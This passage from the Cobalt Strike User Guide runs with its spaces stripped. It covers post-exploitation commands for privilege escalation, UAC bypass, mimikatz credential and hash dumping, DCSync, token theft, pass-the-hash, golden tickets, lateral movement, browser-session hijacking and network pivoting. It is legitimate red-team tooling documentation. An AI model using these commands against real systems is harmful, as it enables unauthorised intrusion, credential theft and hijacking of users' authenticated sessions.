PostExploitation/PrivilegeEscalation Youmayalsolaunchoneoftheseexploitsthrough[beacon] ->Access ->Elevate. Choosealistener,selectanexploit,andpressLaunchtoruntheexploit.Thisdialogisa front-endforBeacon'selevatecommand. figure58-Elevate YoumayaddprivilegeescalationexploitstoCobaltStrikethroughtheElevateKit.The ElevateKitisanAggressorScriptthatintegratesseveralopensourceprivilegeescalation exploitsintoCobaltStrike.https://github.com/rsmudge/ElevateKit. runasadmin-Thiscommandbyitself,listscommandelevatorexploitsregisteredwithCobalt Strike. runasadmin [exploit] [command + args]-Thiscommandattemptstorunthespecified commandinanelevatedcontext. CobaltStrikeseparatescommandelevatorexploitsandsession-yieldingexploitsbecausesome attacksareanaturalopportunitytospawnasession.Otherattacksyielda“runthiscommand” primitive.Spawningasessionfroma“runthiscommand”primitiveputsalotofweaponization decisions(notalwaysfavorable)inthehandsofyourtooldeveloper.Withrunasadmin,it’syour choicetodropanexecutabletodiskandrunit,torunaPowerShellone-liner,ortoweakenthe targetinsomeway. Ifyou’dliketouseaPowerShellone-linertospawnasession,goto[beacon] ->Access ->One- liner. CobaltStrikeUserGuide www.fortra.com page:104
PostExploitation/PrivilegeEscalation figure59-PowerShellOne-liner Thisdialogwillsetupalocalhost-onlywebserverwithinyourBeaconsessiontohostapayload stageandreturnaPowerShellcommandtodownloadandrunthispayloadstage. Thiswebserverisone-useonly.Onceit’sconnectedtoonce,itwillcleanitselfupandstop servingyourpayload. IfyourunaTCPorSMBBeaconwiththistool,youwillneedtouseconnectorlinktoassume controlofthepayloadmanually.Also,beawarethatifyoutrytouseanx64payload—thiswillfail ifthex86PowerShellisinyour$PATH. CobaltStrikedoesnothavemanybuilt-inelevateoptions.Exploitdevelopmentisnotafocusof theworkatFortra.ItiseasytointegrateprivilegeescalationexploitsviaCobaltStrike’s AggressorScriptprogramminglanguagethough.Toseewhatthislookslike,downloadthe ElevateKit(https://github.com/cobalt-strike/ElevateKit).TheElevateKitisanAggressorScript thatintegratesseveralopensourceprivilegeescalationexploitsintoCobaltStrike. Elevate with Known Credentials runas [DOMAIN\user] [password] [command]-Thisrunsacommandasanotheruserusing theircredentials.Therunascommandwillnotreturnanyoutput.Youmayuserunasfrom anon-privilegedcontextthough. spawnas [DOMAIN\user] [password] [listener]-Thiscommandspawnsasessionasanother userusingtheircredentials.Thiscommandspawnsatemporaryprocessandinjectsyour payloadstageintoit. Youmayalsogoto[beacon] ->Access ->Spawn As torunthiscommandaswell. Withbothofthesecommands,beawarethatcredentialsforanon-SID500accountwillspawn apayloadinamediumintegritycontext.YouwillneedtouseBypassUACtoelevatetoahigh CobaltStrikeUserGuide www.fortra.com page:105
PostExploitation/PrivilegeEscalation integritycontext.Also,beaware,thatyoushouldrunthesecommandsfromaworkingfolder thatthespecifiedaccountcanread. Get SYSTEM getsystem-ThiscommandimpersonatesatokenfortheSYSTEMaccount.Thislevelof accessmayallowyoutoperformprivilegedactionsthatarenotpossibleasan Administratoruser. AnotherwaytogetSYSTEMistocreateaservicethatrunsapayload.Theelevate svc-exe [listener] commanddoesthis.Itwilldropanexecutablethatrunsapayload,createaserviceto runit,assumecontrolofthepayload,andcleanuptheserviceandexecutable. UAC Bypass MicrosoftintroducedUserAccountControl(UAC)inWindowsVistaandrefineditinWindows7. UACworksalotlikesudoinUNIX.Day-to-dayauserworkswithnormalprivileges.Whenthe userneedstoperformaprivilegedaction—thesystemasksiftheywouldliketoelevatetheir rights. CobaltStrikeshipswithafewUACbypassattacks.Theseattackswillnotworkifthecurrent userisnotanAdministrator.TocheckifthecurrentuserisintheAdministratorsgroup,userun whoami /groups. elevate uac-token-duplication [listener]-Thiscommandspawnsatemporaryprocesswith elevatedrightsandinjectapayloadstageintoit.ThisattackusesaUAC-loopholethat allowsanon-elevatedprocesstolaunchanarbitraryprocesswithatokenstolenfroman elevatedprocess.Thisloopholerequirestheattacktoremoveseveralrightsassignedto theelevatedtoken.Theabilitiesofyournewsessionwillreflecttheserestrictedrights.If AlwaysNotifyisatitshighestsetting,thisattackrequiresthatanelevatedprocessis alreadyrunninginthecurrentdesktopsession(asthesameuser).Thisattackworkson Windows7andWindows10priortotheNovember2018update. runasadmin uac-token-duplication [command]-Thisisthesameattackdescribedabove,but thisvariantrunsacommandofyourchoosinginanelevatedcontext. runasadmin uac-cmstplua [command]-ThiscommandattemptatobypassUACandruna commandinanelevatedcontext.ThisattackreliesonaCOMobjectthatautomatically elevatesfromcertainprocesscontexts(Microsoftsigned,livesinc:\windows*). Privileges getprivs-Thiscommandenablestheprivilegesassignedtoyourcurrentaccesstoken. CobaltStrikeUserGuide www.fortra.com page:106
PostExploitation/Mimikatz Mimikatz Beaconintegratesmimikatz.Usemimikatz [pid] [arch] [module::command] toinject intothespecifiedprocesstorunamimikatzcommand.Usemimikatz(without[pid]and[arch] arguments)tospawnatemporaryprocesstorunamimikatzcommand. SomemimikatzcommandsmustrunasSYSTEMtowork.Prefixacommandwithan exclamtion( !)toforcemimikatztoelevatetoSYSTEMbeforeitrunsyourcommand.For example,mimikatz!lsa::cache willrecoversaltedpasswordhashescachedbythesystem.Use mimikatz [pid] [arch] [!module::command] ormimikatz [!module::command] (without[pid]and[arch]arguments). IfyouneedtorunamimikatzcommandwithBeacon’scurrentaccesstoken,youcanprefixa commandwitha@toforcemimikatztoimpersonateBeacon’scurrentaccesstoken.For example,mimikatz @lsadump::dcsync willrunthedcsynccommandinmimikatzwith Beacon’scurrentaccesstoken.Usemimikatz [pid] [arch] [@module::command] or mimikatz [@module::command] (without[pid]and[arch]arguments). Ifyouwanttorunmultiplemimikatzcommandsinasinglecommand,usethesemicolon( ;) charactertoseparatemultiplemimikatzcommands.Themaximumlengthofthecommandsis 511characters.Forexample,mimikatz crypto::capi ; crypto::certificates /systemstore:local_machine /store:my /export Credential and Hash Harvesting Todumphashes,goto[beacon] ->Access ->Dump Hashes.Youcanalsousethehashdump [pid] [x86|x64]commandfromtheBeaconconsoletoinjectthehashdumptoolintothe specifiedprocess.Usehashdump(without[pid]and[arch]arguments)tospawnatemporary processandinjectthehashdumptoolintoit.Thesecommandswillspawnajobthatinjectsinto LSASSanddumpsthepasswordhashesforlocalusersonthecurrentsystem.Thiscommand requiresadministratorprivileges.Ifinjectingintoapidthatprocessrequiresadministrator privileges. Uselogonpasswords [pid] [arch]toinjectintothespecifiedprocesstodumpplaintext credentialsandNTLMhashes.Uselogonpasswords(without[pid]and[arch]arguments)to spawnatemporaryprocesstodumpplaintextcredentialsandNTLMhashes.Thiscommand usesmimikatzandrequiresadministratorprivileges. Usedcsync [pid] [arch] [DOMAIN.fqdn] <DOMAIN\user>toinjectintothespecifiedprocessto extracttheNTLMpasswordhashes.Usedcsync [DOMAIN.fqdn] <DOMAIN\user>tospawna temporaryprocesstoextracttheNTLMpasswordhashes.Thiscommandusesmimikatzto extracttheNTLMpasswordhashfordomainusersfromthedomaincontroller.Specifyauser togettheirhashonly.Thiscommandrequiresadomainadministratortrustrelationship. CobaltStrikeUserGuide www.fortra.com page:107
PostExploitation/PortScanning Usechromedump [pid] [arch]toinjectintothespecifiedprocesstorecovercredentialmaterial fromGoogleChrome.Usechromedump(without[pid]and[arch]arguments)tospawna temporaryprocesstorecovercredentialmaterialfromGoogleChrome.Thiscommandwilluse Mimikatztorecoverthecredentialmaterialandshouldberununderausercontext. CredentialsdumpedwiththeabovecommandsarecollectedbyCobaltStrikeandstoredinthe credentialsdatamodel.GotoView ->Credentials topullupthecredentialsonthecurrentteam server. Port Scanning Beaconhasabuiltinportscanner.Useportscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections]toinjectintothespecifiedprocesstorunaportscanagainstthespecified hosts.Useportscan [targets] [ports] [arp|icmp|none] [max connections](without[pid]and [arch]arguments)tospawnatemporaryprocesstorunaportscanagainstthespecifiedhosts. The[targets]optionisacommaseparatedlistofhoststoscan.Youmayalso specifyIPv4addressranges(e.g.,192.168.1.128-192.168.2.240,192.168.1.0/24) The[ports]optionisacommaseparatedlistorportstoscan.Youmayspecifyport rangesaswell(e.g.,1-65535) The[arp|icmp|none]targetdiscoveryoptionsdictatehowtheportscanningtoolwill determineifahostisalive.TheARPoptionusesARPtoseeifasystemrespondsto thespecifiedaddress.TheICMPoptionsendsanICMPechorequest.Thenone optiontellstheportscantooltoassumeallhostsarealive. The[max connections]optionlimitshowmanyconnectionstheportscantoolwill attemptatanyonetime.TheportscantoolusesasynchronousI/Oandit'sableto handlealargenumberofconnectionsatonetime.Ahighervaluewillmakethe portscangomuchfaster.Thedefaultis1024. Theportscannerwillrun,inbetweenBeaconcheckins.Whenithasresultstoreport,itwillsend themtotheBeaconconsole.CobaltStrikewillprocessthisinformationandupdatethetargets modelwiththediscoveredhosts. Youcanalsogoto[beacon] -> Explore -> Port Scannertolaunchtheportscannertool. Network and Host Enumeration Beacon’snetmoduleprovidestoolstointerrogateanddiscovertargetsinaWindowsactive directorynetwork. CobaltStrikeUserGuide www.fortra.com page:108
PostExploitation/TrustRelationships Usenet [pid] [arch] [command] [arguments]toinjectthenetworkandhostenumerationtool intothespecifiedprocess.Usenet [command] [arguments](without[pid]and[arch] arguments)tospawnatemporaryprocessandinjectthenetworkandhostenumerationtool intoit.Anexceptionisthenet domaincommandwhichisimplementedasaBOF.netdomain. ThecommandsinBeacon’snetmodulearebuiltontopoftheWindowsNetworkEnumeration APIs.Mostofthesecommandsaredirectreplacementsformanyofthebuilt-innetcommands inWindows(therearealsoafewuniquecapabilitieshereaswell).Thefollowingcommandsare available: computers-listshostsinadomain(groups) dclist-listsdomaincontrollers.(populatesthetargetsmodel) domain-displaydomainforthishost domain_controllers-listsDCsinadomain(groups) domain_trusts-listsdomaintrusts group-listsgroupsandusersingroups localgroup-listslocalgroupsandusersinlocalgroups.(greatduringlateralmovementwhen youhavetofindwhoisalocaladminonanothersystem). logons-listsusersloggedontoahost sessions-listssessionsonahost share-listssharesonahost user-listsusersanduserinformation time-showtimeforahost view-listshostsinadomain(browserservice).(populatesthetargetsmodel) Trust Relationships TheheartofWindowssinglesign-onistheaccesstoken.WhenauserlogsontoaWindows host,anaccesstokenisgenerated.Thistokencontainsinformationabouttheuserandtheir rights.Theaccesstokenalsoholdsinformationneededtoauthenticatethecurrentuserto anothersystemonthenetwork.ImpersonateorgenerateatokenandWindowswilluseits informationtoauthenticatetoanetworkresourceforyou. CobaltStrikeUserGuide www.fortra.com page:109
PostExploitation/TrustRelationships Usesteal_token [pid]orsteal_token [pid] tostealan accesstokenfromanexistingprocess. Token Store Thetokenstorefacilitateshot-swappableaccesstokens.Usetoken-store steal [pid,...] tostealanaccesstokenandstoreit.Toimmediately applythestolentoken,usetoken-store steal-and-use [pid] . Thetoken-store showcommandliststheaccesstokenscurrentlyavailableinthetokenstore. Usetoken-store use [id]toapplyanaccesstokentothecurrentBeacon. token-store remove [id,...]andtoken-store remove-allcommandscanbeusedtoremove storedtokensfromthestore. Ifyou’dliketoseewhichprocessesarerunninguseps.Thegetuidcommandwillprintyour currenttoken.Userev2selftorevertbacktoyouroriginaltoken. OpenProcessTokenaccessmasksuggestedvalues: blank = default (TOKEN_ALL_ACCESS) 0 = TOKEN_ALL_ACCESS 11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8) Access mask values: STANDARD_RIGHTS_REQUIRED . . . . : 983040 TOKEN_ASSIGN_PRIMARY . . . . . . : 1 TOKEN_DUPLICATE . . . . . . . . : 2 TOKEN_IMPERSONATE . . . . . . . : 4 TOKEN_QUERY . . . . . . . . . . : 8 TOKEN_QUERY_SOURCE . . . . . . . : 16 TOKEN_ADJUST_PRIVILEGES . . . . : 32 TOKEN_ADJUST_GROUPS . . . . . . : 64 TOKEN_ADJUST_DEFAULT . . . . . . : 128 TOKEN_ADJUST_SESSIONID . . . . . : 256 NOTE: 'OpenProcessTokenaccessmask'canbehelpfulforstealingtokensfromprocessesusing 'SYSTEM'userandyouhavethiserror:Couldnotopenprocesstoken:{pid}(5) CobaltStrikeUserGuide www.fortra.com page:110
PostExploitation/LateralMovement Youcansetyourpreferreddefaultwith'.steal_token_access_mask'intheMalleableC2global options. Ifyouknowcredentialsforauser;usemake_token [DOMAIN\user] [password]togeneratea tokenthatpassesthesecredentials.Thistokenisacopyofyourcurrenttokenwithmodified singlesign-oninformation.Itwillshowyourcurrentusername.Thisisexpectedbehavior. TheBeaconcommandpth [pid] [arch] [DOMAIN\user] [ntlm hash]injectsintothespecified processtogenerateANDimpersonateatoken.Usepth [DOMAIN\user] [ntlm hash](without [pid]and[arch]arguments)tospawnatemporaryprocesstogenerateANDimpersonatea token.ThiscommandusesmimikatztogenerateANDimpersonateatokenthatusesthe specifiedDOMAIN,user,andNTLMhashassinglesign-oncredentials.Beaconwillpassthis hashwhenyouinteractwithnetworkresources. Beacon’sMakeTokendialog([beacon]->Access->Make Token)isafront-endforthese commands.Itwillpresentthecontentsofthecredentialmodelanditwillusetheright commandtoturntheselectedcredentialentryintoanaccesstoken. Kerberos Tickets AGoldenTicketisaself-generatedKerberosticket.It'smostcommontoforgeaGoldenTicket withDomainAdministratorrights Goto[beacon]->Access->Golden TickettoforgeaGoldenTicketfromCobaltStrike.Provide thefollowingpiecesofinformationandCobaltStrikewillusemimikatztogenerateaticketand injectitintoyourkerberostray:
- Theuseryouwanttoforgeaticket.
- Thedomainyouwanttoforgeaticketfor.
- Thedomain'sSID
- TheNTLMhashofthekrbtgtuseronadomaincontroller. Usekerberos_ticket_use [/path/to/ticket]toinjectaKerberosticketintothecurrentsession. ThiswillallowBeacontointeractwithremotesystemsusingtherightsinthisticket. Usekerberos_ticket_purgetoclearanyKerberosticketsassociatedwithyoursession. Lateral Movement Onceyouhaveatokenforadomainadminoradomainuserwhoisalocaladminonatarget, youmayabusethistrustrelationshiptogetcontrolofthetarget.CobaltStrike’sBeaconhas severalbuilt-inoptionsforlateralmovement. CobaltStrikeUserGuide www.fortra.com page:111
PostExploitation/LateralMovementGUI Typejump tolistlateralmovementoptionsregisteredwithCobaltStrike.Runjump [module] [target] [listener] toattempttorunapayloadonaremotetarget. Jump Module Arch Description psexec x86 UseaservicetorunaServiceEXEartifact psexec64 x64 UseaservicetorunaServiceEXEartifact psexec_psh x86 UseaservicetorunaPowerShellone-liner winrm x86 RunaPowerShellscriptviaWinRM winrm64 x64 RunaPowerShellscriptviaWinRM Runremote-exec,byitself,tolistremoteexecutionmodulesregisteredwithCobaltStrike.Use remote-exec [module] [target] [command + args] toattempttorunthespecifiedcommand onaremotetarget. Remote-exec Module Description psexec RemoteexecuteviaServiceControl Manager winrm RemoteexecuteviaWinRM (PowerShell) wmi RemoteexecuteviaWMI Lateralmovementisanarea,similartoprivilegeescalation,wheresomeattackspresenta naturalsetofprimitivestospawnasessiononaremotetarget.Someattacksgiveanexecute- primitiveonly.Thesplitbetweenjumpandremote-execgivesyouflexibilitytodecidehowto weaponizeanexecute-onlyprimitive. AggressorScripthasanAPItoaddnewmodulestojumpandremote-exec.SeetheAggressor Scriptdocumentation(theBeaconchapter,specifically)formoreinformation. Lateral Movement GUI CobaltStrikealsoprovidesaGUItomakelateralmovementeasier.SwitchtotheTargets VisualizationorgotoView ->Targets.Navigateto[target] ->Jump andchooseyourdesired lateralmovementoption. Thefollowingdialogwillopen: CobaltStrikeUserGuide www.fortra.com page:112
PostExploitation/BeaconDataStore figure60-LateralMovementDialog Tousethisdialog: First,decidewhichtrustyouwanttouseforlateralmovement.Ifyouwanttousethetokenin oneofyourBeacons,checktheUsesession’scurrentaccesstokenbox.Ifyouwanttouse credentialsorhashesforlateralmovement—that’sOKtoo.Selectcredentialsfromthe credentialstoreorpopulatetheUser,Password,andDomainfields.Beaconwillusethis informationtogenerateanaccesstokenforyou.Keepinmind,youneedtooperatefromahigh integritycontext[administrator]forthistowork. Next,choosethelistenertouseforlateralmovement.TheSMBBeaconisusuallyagood candidatehere. Last,selectwhichsessionyouwanttoperformthelateralmovementattackfrom.Cobalt Strike’sasynchronousmodelofoffenserequireseachattacktoexecutefromacompromised system. ThereisnooptiontoperformthisattackwithoutaBeaconsessiontoattackfrom.Ifyou’reon aninternalengagement,considerhookingaWindowssystemthatyoucontrolandusethatas yourstartingpointtoattackothersystemswithcredentialsorhashes. PressLaunch.CobaltStrikewillactivatethetabfortheselectedBeaconandissuecommands toit.FeedbackfromtheattackwillshowupintheBeaconconsole. Beacon Data Store CobaltStrikeUserGuide www.fortra.com page:113
PostExploitation/OtherCommands BeaconDataStoreenablesanoperatortostoreBeaconObjectFiles(BOFs)and.NET assembliesinBeacon'smemory.Thesestoreditemscansubsequentlybeexecutedmultiple timeswithoutresendingtheitem.TheCobaltStrikeclientautomaticallydetectswhetheran objecttobeexecutedisalreadystoredinthedatastore.Thestoredentriesaremaskedby default,andtheitemisunmaskedonlywhenitisused. InadditiontoBeaconObjectFilesand.NETassemblies,itispossibletostoregenericfilesinthe datastore,andthesefilescanbeaccessedfromwithinBOFs.Furtherdetailscanbefoundon theBOFCAPIpage. Thedefaultsizeofthedatastoreis16entries,butyoucanmodifythissizebyconfiguringthe data_store_sizeoptionwithinthestageblockofaC2profile. Thedata-store load [bof|dotnet|file] [file path]commandstoresaniteminthestore. Ifthenameargumentisnotprovided,thenthefilenameisused. Thedata-store unload [index]removesthestoreditem. Thedata-store listliststheitemscurrentlyavailableinthedatastore. Other Commands Beaconhasafewothercommandsnotcoveredabove. TheclearcommandwillclearBeacon'stasklist.Usethisifyoumakeamistake. TypeexittoaskBeacontoexit. Usekill [pid]toterminateaprocess. UsetimestomptomatchtheModified,Accessed,andCreatedtimesofonefiletothoseof anotherfile. CobaltStrikeUserGuide www.fortra.com page:114
BrowserPivoting/Overview Browser Pivoting MalwarelikeZeusanditsvariantsinjectthemselvesintoauser’sbrowsertostealbanking information.Thisisaman-in-the-browserattack.So-called,becausetheattackerisinjecting malwareintothetarget’sbrowser. Overview Man-in-the-browsermalwareusestwoapproachestostealbankinginformation.Theyeither captureformdataasit’ssenttoaserver.Forexample,malwaremighthookPR_WriteinFirefox tointerceptHTTPPOSTdatasentbyFirefox.Or,theyinjectJavaScriptontocertainwebpages tomaketheuserthinkthesiteisrequestinginformationthattheattackerneeds. CobaltStrikeoffersathirdapproachforman-in-the-browserattacks.Itletstheattackerhijack authenticatedwebsessions—allofthem.Onceauserlogsontoasite,anattackermayaskthe user’sbrowsertomakerequestsontheirbehalf.Sincetheuser’sbrowserismakingtherequest, itwillautomaticallyre-authenticatetoanysitetheuserisalreadyloggedonto.Icallthisa browserpivot—becausetheattackerispivotingtheirbrowserthroughthecompromiseduser’s browser. figure61-BrowserPivotinginAction CobaltStrike’simplementationofbrowserpivotingforInternetExplorerinjectsanHTTPproxy serverintothecompromiseduser’sbrowser.Donotconfusethiswithchangingtheuser’sproxy settings.Thisproxyserverdoesnotaffecthowtheusergetstoasite.Rather,thisproxyserver isavailabletotheattacker.Allrequeststhatcomethroughitarefulfilledbytheuser’sbrowser. CobaltStrikeUserGuide www.fortra.com page:115
BrowserPivoting/Setup Setup TosetupBrowserpivoting,goto[beacon] ->Explore ->Browser Pivot.ChoosetheInternet Explorerinstancethatyouwanttoinjectinto.Youmayalsodecidewhichporttobindthe browserpivotingproxyservertoaswell. figure62-StartaBrowserPivot Bewarethattheprocessyouinjectintomattersagreatdeal.InjectintoInternetExplorerto inheritauser’sauthenticatedwebsessions.ModernversionsofInternetExplorerspawneach tabinitsownprocess.IfyourtargetusesamodernversionofInternetExplorer,youmustinject aprocessassociatedwithanopentabtoinheritsessionstate.Whichtabprocessdoesn’t matter(childtabssharesessionstate). IdentifyInternetExplorertabprocessesbylookingatthePPIDvalueintheBrowserPivoting setupdialog.IfthePPIDreferencesexplorer.exe,theprocessisnotassociatedwithatab.Ifthe PPIDreferencesiexplore.exe,theprocessisassociatedwithatab.CobaltStrikewillshowa checkmarknexttotheprocessesitthinksyoushouldinjectinto. OnceBrowserPivotingissetup,setupyourwebbrowsertousetheBrowserPivotProxyserver. Remember,CobaltStrike’sBrowserPivotserverisanHTTPproxyserver. CobaltStrikeUserGuide www.fortra.com page:116
BrowserPivoting/Use figure63-ConfigureBrowserSettings Use Youmaybrowsethewebasyourtargetuseroncebrowserpivotingisstarted.Bewarethatthe browserpivotingproxyserverwillpresentitsSSLcertificateforSSL-enabledwebsitesyouvisit. Thisisnecessaryforthetechnologytowork. Thebrowserpivotingproxyserverwillaskyoutoaddahosttoyourbrowser’struststorewhen itdetectsanSSLerror.AddthesehoststothetruststoreandpressrefreshtomakeSSL protectedsitesloadproperly. Ifyourbrowserpinsthecertificateofatargetsite,youmayfinditsimpossibletogetyour browsertoacceptthebrowserpivotingproxyserver’sSSLcertificate.Thisisapain.Oneoption istouseadifferentbrowser.TheopensourceChromiumbrowserhasacommand-lineoption toignoreallcertificateerrors.Thisisidealforbrowserpivotinguse: chromium --ignore-certificate-errors --proxy-server=[host]:[port] TheabovecommandisavailablefromView ->Proxy Pivots.HighlighttheBrowserPivotHTTP ProxyentryandpressTunnel. TostoptheBrowserPivotproxyserver,typebrowserpivot stop initsBeaconconsole. CobaltStrikeUserGuide www.fortra.com page:117
BrowserPivoting/HowBrowserPivotingWorks Youwillneedtoreinjectthebrowserpivotproxyserveriftheuserclosesthetabyou’reworking from.TheBrowserPivottabwillwarnyouwhenitcan’tconnecttothebrowserpivotproxy serverinthebrowser. NOTE: OpenJDK11hasaTLSimplementationbugthatcausesERR_SSL_PROTOCOL_ERROR (Chrome/Chromium)andSSL_ERROR_RX_RECORD_TOO_LONG(Firefox)wheninteracting withhttps://sites.Ifyouencountertheseerrors--downgradeyourteamservertoOracle Java1.8orOpenJDK10. How Browser Pivoting Works InternetExplorerdelegatesallofitscommunicationtoalibrarycalledWinINet.Thislibrary, whichanyprogrammayuse,managescookies,SSLsessions,andserverauthenticationforits consumers.CobaltStrike’sBrowserPivotingtakesadvantageofthefactthatWinINet transparentlymanagesauthenticationandreauthenticationonaperprocessbasis. ByinjectingCobaltStrike’sBrowserPivotingtechnologyintoauser’sInternetExplorerinstance, yougetthistransparentreauthenticationforfree. CobaltStrikeUserGuide www.fortra.com page:118
Pivoting/WhatisPivoting Pivoting What is Pivoting Pivoting,forthesakeofthismanual,isturningacompromisedsystemintoahoppointforother attacksandtools.CobaltStrike’sBeaconprovidesseveralpivotingoptions.Foreachofthese options,youwillwanttomakesureyourBeaconisininteractivemode.Interactivemodeis whenaBeaconchecksinmultipletimeseachsecond.Usethesleep 0 commandtoputyour Beaconintointeractivemode. SOCKS Proxy Goto[beacon] ->Pivoting ->SOCKS Server tosetupaSOCKS4orSOCKS5proxyserveron yourteamserver.Or,usesocks 8080 tosetupaSOCKSproxyserveronport8080(oranyother portyouchoose). AllconnectionsthatgothroughtheseSOCKSserversturnintoconnect,read,write,andclose tasksfortheassociatedBeacontoexecute.YoumaytunnelviaSOCKSthroughanytypeof Beacon(evenanSMBBeacon). Beacon’sHTTPdatachannelisthemostresponsiveforpivotingpurposes.Ifyou’dliketopivot trafficoverDNS,usetheDNSTXTrecordcommunicationmode. Usesocks [port] [socks4 | socks5] [enableNoAuth | disableNoAuth] [user] [password] [enableLogging | disableLogging]tostartaSOCKS4a(bydefaultwhennoserverversionis specified)orSOCKS5serveronthespecifiedport.Thisserverwillrelayconnectionsthrough thisBeacon. SOCKS5serverscanbeconfiguredwithNoAuthauthentication(default),User/Password authentication,andsomeadditionallogging. SOCKS5ServerscurrentlydonotsupportGSSAPIauthenticationandIPV6. ToseetheSOCKSserversthatarecurrentlysetup,gotoView ->Proxy Pivots. Usesocks stoptostoptheSOCKSserversandterminateexistingconnections. TrafficwillnotrelaywhileBeaconisasleep.Changethesleeptimewiththesleepcommandto reducelatency. Proxychains CobaltStrikeUserGuide www.fortra.com page:119
Pivoting/ReversePortForward TheproxychainstoolwillforceanexternalprogramtouseaSOCKSproxyserverthatyou designate.Youmayuseproxychainstoforcethird-partytoolsthroughCobaltStrike’sSOCKS server.Tolearnmoreaboutproxychains,visit:http://proxychains.sourceforge.net/ Metasploit YoumayalsotunnelMetasploitFrameworkexploitsandmodulesthroughBeacon.Createa BeaconSOCKSproxyserver[asdescribedabove]andpastethefollowingintoyourMetasploit Frameworkconsole: setg Proxies socks4:team server IP:proxy port setg ReverseAllowProxy true ThesecommandswillinstructtheMetasploitFrameworktoapplyyourProxiesoptiontoall modulesexecutedfromthispointforward.Onceyou’redonepivotingthroughBeaconinthis way,useunsetg Proxies tostopthisbehavior. Ifyoufindtheabovetoughtoremember,gotoView ->Proxy Pivots.Highlighttheproxypivot yousetupandpressTunnel.ThisbuttonwillprovidethesetgProxiessyntaxneededtotunnel theMetasploitFrameworkthroughyourBeacon. Reverse Port Forward Thefollowingcommandsareavailable: NOTE: Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya commandnametoseedetailedhelp. rportfwd-UsethiscommandtosetupareversepivotthroughBeacon.Therportfwdcommand willbindaportonthecompromisedtarget.Anyconnectionstothisportwillcauseyour CobaltStrikeservertoinitiateaconnectiontoanotherhostandportandrelaytraffic betweenthesetwoconnections.CobaltStriketunnelsthistrafficthroughBeacon. Thesyntaxforrportfwdis:rportfwd [bind port] [forward host] [forward port]. rportfwd_local-UsethiscommandtosetupareversepivotthroughBeaconwithonevariation. Thisfeatureinitiatesaconnectiontotheforwardhost/portfromyourCobaltStrikeclient. TheforwardedtrafficiscommunicatedthroughtheconnectionyourCobaltStrikeclient hastoitsteamserver. rportfwd stop [bind port]-Usetodisablethereverseportforward. CobaltStrikeUserGuide www.fortra.com page:120
Pivoting/SpawnandTunnel Spawn and Tunnel Usethespunnelcommandtospawnathird-partytoolinatemporaryprocessandcreatea reverseportforwardforit.Thesyntaxisspunnel [x86 or x64] [controller host] [controller port] [/path/to/agent.bin].Thiscommandexpectsthattheagentfileisposition-independent shellcode(usuallytherawoutputfromanotheroffenseplatform).Thespunnel_localcommand isthesameasspunnel,exceptitinitiatesthecontrollerconnectionfromyourCobaltStrike client.Thespunnel_localtrafficiscommunicatedthroughtheconnectionyourCobaltStrike clienthastoitsteamserver. Agent Deployed:Interoperability with Core Impact ThespunnelcommandsweredesignedspecificallytotunnelCoreImpact'sagentthrough CobaltStrike'sBeacon.CoreImpactisapenetrationtestingtoolandexploitframeworkalso availableforlicensefromFortraathttps://www.coresecurity.com/products/core-impact ToexportarawagentfilefromCoreImpact:
- ClicktheModules tabintheCoreImpactuserinterface
- SearchforPackage and Register Agent
- Double-clickthismodule
- ChangePlatform toWindows
- ChangeArchitecture tox86-64
- ChangeBinary Type toraw
- ClickTarget File andpress...todecidewheretosavetheoutput.
- GotoAdvanced
- ChangeEncrypt Code tofalse
- GotoAgent Connection
- ChangeConnection Method toConnectfrom Target
- ChangeConnect Back Hostname to127.0.0.1
- ChangePort tosomevalue(e.g.,9000)andrememberit.
- PressOK. TheabovewillgenerateaCoreImpactagentasarawfile.Youmayusespunnelx64orspunnel_ localx64torunthisagentandtunnelitbacktoCoreImpact. WeoftenuseCobaltStrikeonaninternetreachableinfrastructureandCoreImpactisoftenona localWindowsvirtualmachine.It'sforthisreasonwehavespunnel_local.Werecommendthat yourunaCobaltStrikeclientfromthesameWindowssystemthatCoreImpactisinstalledonto. CobaltStrikeUserGuide www.fortra.com page:121
Pivoting/PivotListeners Inthissetup,youcanrunspunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin.Oncethe connectionismade,youwillhearthefamous"AgentDeployed"wavfile. WithanImpactagentontarget,youhavetoolstoescalateprivileges,scanandinformation gatherviamanymodules,launchremoteexploits,andchainotherImpactagentsthroughyour Beaconconnection. Pivot Listeners It’sgoodtradecrafttolimitthenumberofdirectconnectionsfromyourtarget’snetworktoyour commandandcontrolinfrastructure.Apivotlistenerallowsyoutocreatealistenerthatis boundtoaBeaconorSSHsession.Inthisway,youcancreatenewreversesessionswithout moredirectconnectionstoyourcommandandcontrolinfrastructure. Tosetupapivotlistener,goto[beacon] ->Pivoting ->Listener….Thiswillopenadialogwhere youmaydefineanewpivotlistener. figure64-ConfigureaPivotListener ApivotlistenerwillbindtoListenPortonthespecifiedSession.TheListenHostvalueconfigures theaddressyourreverseTCPpayloadwillusetoconnecttothislistener. Rightnow,theonlypayloadoptioniswindows/beacon_reverse_tcp.Thisisalistenerwithouta stager.Thismeansyoucan’tembedthispayloadintocommandsandautomationthatexpect stagers.Youdohavetheoptiontoexportastagelesspayloadartifactandrunittodelivera reverseTCPpayload. CobaltStrikeUserGuide www.fortra.com page:122
Pivoting/CovertVPN PivotListenersdonotchangethepivothost’sfirewallconfiguration.Ifapivothosthasahost- basedfirewall,thismayinterferewithyourlistener.You,theoperator,areresponsiblefor anticipatingthissituationandtakingtherightstepsforit. Toremoveapivotlistener,gotoCobalt Strike ->Listeners andremovethelistenerthere. CobaltStrikewillsendatasktoteardownthelisteningsocket,ifthesessionisstillreachable. Covert VPN VPNpivotingisaflexiblewaytotunneltrafficwithoutthelimitationsofaproxypivot.Cobalt StrikeoffersVPNpivotingthroughitsCovertVPNfeature.CovertVPNcreatesanetwork interfaceontheCobaltStrikesystemandbridgesthisinterfaceintothetarget’snetwork. How to Deploy ToactivateCovertVPN,right-clickacompromisedhost,goto[beacon] ->Pivoting ->Deploy VPN.SelecttheremoteinterfaceyouwouldlikeCovertVPNtobindto.Ifnolocalinterfaceis present,pressAdd tocreateone. figure65-DeployCovertVPN CheckClone host MAC addresstomakeyourlocalinterfacehavethesameMACaddressas theremoteinterface.It’ssafesttoleavethisoptionchecked. PressDeploy tostarttheCovertVPNclientonthetarget.CovertVPNrequiresAdministrator accesstodeploy. OnceaCovertVPNinterfaceisactive,youmayuseitlikeanyphysicalinterfaceonyoursystem. 